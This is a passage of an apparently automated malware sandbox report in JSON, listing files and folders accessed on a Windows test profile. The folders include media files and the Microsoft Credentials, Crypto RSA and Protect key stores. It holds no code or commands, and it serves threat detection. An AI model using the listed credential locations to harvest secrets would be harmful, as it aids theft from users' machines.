wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\B95U.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\b95u.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\M9qFpAQ6hssl8wHB.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\m9qfpaq6hssl8whb.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\MMTRDLYGm.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\mmtrdlygm.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\om RIMvMjXnxZplIa-.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\om rimvmjxnxzplia-.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\bdvGDQlhD8Y.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\bdvgdqlhd8y.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\ldkH5kxqMk43.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\ldkh5kxqmk43.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\BPwDqBd367v5jCWf.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\bpwdqbd367v5jcwf.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\LbtiEV6ysxhhXCJQ.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\lbtiev6ysxhhxcjq.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\gIud.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\giud.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\QNSMQvCMaaiUq5u.wav", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\music\\qnsmqvcmaaiuq5u.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\Eyqf5KSeCaMN6njljm\\y3M6CHiHDf_Yy2sBAzE.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\eyqf5ksecamn6njljm\\y3m6chihdf_yy2sbaze.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4\\eJvtTMxbiz6SbBueW.swf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\ejvttmxbiz6sbbuew.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4\\xSTC7qezlhs _STE0B.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\xstc7qezlhs _ste0b.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\WQHnOCgB21aCcC\\4M2T-htfvXV73.swf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\wqhnocgb21accc\\4m2t-htfvxv73.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\-VerO sQDwv.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\-vero sqdwv.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\TRj26cC8jkp.flv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\trj26cc8jkp.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\uBDJLyCr8A-TTa.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\ubdjlycr8a-tta.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\7X-GM.flv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\7x-gm.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\l1V__tJSHnXI.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\l1v__tjshnxi.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\ppcN9b5Q ExH-k00.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\ppcn9b5q exh-k00.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\zWeITqPQ 5L.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\zweitqpq 5l.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\4wDnaCEpKp.swf", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\4wdnacepkp.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\dew6BPRQzNyZf.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\dew6bprqznyzf.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\fcAcCQTQF.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\fcaccqtqf.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\J2AjPHasg.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\j2ajphasg.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\empW-4AlIY3p9Rubm.mp4", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\empw-4aliy3p9rubm.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\jJRuTZgC0AQOiwVU.flv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\jjrutzgc0aqoiwvu.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\pI8CT7hfK.avi", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\pi8ct7hfk.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\TydhicM2z.flv", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\tydhicm2z.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\1LWQeuU.xls", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\1lwqeuu.xls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\8ir7B9DO0uh.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\8ir7b9do0uh.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\SakdPF0XTjzY.png", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\sakdpf0xtjzy.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\nvss.exe.config", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\nvss.exe.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData\\Keyboard", "hashes": [], "norm_filename": "c:\\programdata\\keyboard", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\ProgramData", "hashes": [], "norm_filename": "c:\\programdata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Acrobat", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\acrobat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\acrobat\\10.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Flash Player", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\flash player", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\flash player\\assetcache", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Headlights", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\headlights", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Linguistics", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\linguistics", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\linguistics\\dictionaries", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Adobe\\LogTransport2", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\adobe\\logtransport2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Identities", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\identities", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia\\Flash Player", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia\\flash player", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia\\flash player\\macromedia.com", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\AddIns", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\addins", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\CLView", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\clview", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\CLView\\1033", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\clview\\1033", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Credentials", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\credentials", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Crypto", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\crypto", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\crypto\\rsa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1534390919-4215197118-2202912847-1000", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-1534390919-4215197118-2202912847-1000", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Document Building Blocks", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\document building blocks", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\document building blocks\\1033", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Excel", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\excel", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\excel\\xlstart", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\IME12", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\ime12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\IMJP10", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\imjp10", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\IMJP12", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\imjp12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\IMJP8_1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\imjp8_1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\IMJP9_0", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\imjp9_0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\quick launch", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\0FHKRMGG", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\0fhkrmgg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\34YFITI6", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\34yfiti6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\4ERT46Z6", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\4ert46z6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\5XG08RN1", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\5xg08rn1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\MMC", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\mmc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\MS Project", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\ms project", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\MS Project\\12", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\ms project\\12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\MS Project\\12\\1033", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\ms project\\12\\1033", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Network", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\network", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Network\\Connections", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\network\\connections", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\network\\connections\\pbk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Office", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\office", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Office\\Recent", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\office\\recent", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Outlook", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\outlook", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Proof", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\proof", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Protect", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\protect", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1534390919-4215197118-2202912847-1000", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1534390919-4215197118-2202912847-1000", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Publisher", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\publisher", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Speech", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\speech", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Speech\\Files", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\speech\\files", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\AppData\\Roaming\\Microsoft\\Speech\\Files\\UserLexicons", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\appdata\\roaming\\microsoft\\speech\\files\\userlexicons", "operations": [ "access" ], "type": "file_artifact", 